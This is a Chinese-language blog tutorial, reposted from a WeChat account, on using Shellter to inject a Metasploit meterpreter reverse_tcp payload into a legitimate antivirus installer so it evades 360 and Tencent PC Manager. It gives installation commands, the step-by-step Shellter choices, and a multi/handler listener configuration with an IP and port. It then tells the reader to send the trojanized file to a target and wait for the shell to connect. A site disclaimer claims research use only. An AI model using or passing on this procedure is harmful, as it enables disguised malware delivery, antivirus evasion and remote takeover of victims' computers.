利用Shellter免杀过360、电脑管家

admin 2022年11月15日03:11:01安全文章评论25 views829字阅读2分45秒阅读模式

利用Shellter免杀过360、电脑管家

Shellter 是一个 shellcode 注入工具。它有效地重新编码有效负载(此处为外壳代码)以绕过防病毒(AV)软件。Shellter已被证明是Windows 32位应用程序的PE(可移植可执行文件)文件格式的第一个动态感染者。要使用Shellter,您可以创建自己的shellcode,也可以从Metasploit等框架中创建一个shellcode。Shellter 嵌入了一个 32 位 Windows 应用程序和 shellcode。

安装

apt-get update

apt-get install shellter

然后还需要安装wine32

dpkg --add-architecture i386 && apt-get update && apt-get install wine32:i386

中间有不少报错大家跟着提示装东西就行,如果出现这个报错Wine:无法加载kernel32.dll,状态c0000135,跟着安装就行

利用Shellter免杀过360、电脑管家

下载完后就准备一个安装包放在kali,这里我准备的是火绒的安装包(真就拿杀软免杀呗)

制作免杀

打开shellter

利用Shellter免杀过360、电脑管家


选择操作方式:自动/手动,我们选择自动:A ,回车下一步输入你准备的exe路径

利用Shellter免杀过360、电脑管家


等待生成结束后,它会询问我们是否启用隐身模式,可以根据情况,但是启用隐身模式后免杀能力会变弱,所以不建议启用,然后下一步选择 L 列出负载。

利用Shellter免杀过360、电脑管家

这里我选择的第一个

利用Shellter免杀过360、电脑管家

这里输入ip跟端口

利用Shellter免杀过360、电脑管家


再次按下回车后shellter就会帮我们注入shellcode并退出程序,然后我们在msf配置反弹会话的 handler

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.22.1.189
set port 6666
run

最后把马子发给目标,运行后等待上线,下面是过电脑管家跟360的截图。


利用Shellter免杀过360、电脑管家


利用Shellter免杀过360、电脑管家

原文始发于微信公众号(XK Team):利用Shellter免杀过360、电脑管家

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月15日03:11:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  利用Shellter免杀过360、电脑管家 http://cn-sec.com/archives/1409843.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: